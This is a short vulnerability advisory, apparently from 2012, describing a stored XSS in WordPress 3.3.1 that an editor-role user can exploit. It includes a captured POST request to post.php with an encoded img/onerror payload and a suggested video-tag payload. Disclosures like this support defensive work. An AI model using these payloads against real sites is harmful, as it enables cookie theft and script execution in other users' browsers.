# TITLE ....... # Wordpress 3.3.1 post-auth persistent XSS ............ # # DATE ........ # 18.02.2012 .......................................... # # AUTOHR ...... # http://hauntit.blogspot.com ......................... # # SOFT LINK ... # http://wordpress.org ................................ # # VERSION ..... # 1.0.0 ............................................... # # TESTED ON ... # LAMP ................................................ # # ..................................................................... # # 1. What is this? # 2. What is the type of vulnerability? # 3. Where is bug :) # 4. More... #............................................# # 1. What is this? This is very nice CMS, You should try it! ;) # 2. What is the type of vulnerability? This is standard persistent XSS for normal (registered) user (with 'editor' role). "An attacker may exploit the html-injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the saffected site. This may allow to steal cookie-based authentication credentials, control how the site is displayed, and launch other attacks." # 3. Where is bug :) ...cut from Burp... POST /www/Wordpress/wordpress/wp-admin/post.php HTTP/1.1 (...) content=qqqqqqqqqqqqqqqqqqqqqq"%2f%3e%3cimg%20src%3dx%20onerror%3dalert(123)%3e%3c ...cut from Burp... By setting up 'content' parameter to value contains JS payload we can trigger XSS (add it for other users in WP). Payload to use for storing XSS could be tag 'video': <video onload=<xss>> # 4. More... - http://www.wordpress.org - http://hauntit.blogspot.com - http://www.google.com - http://portswigger.net # Best regards #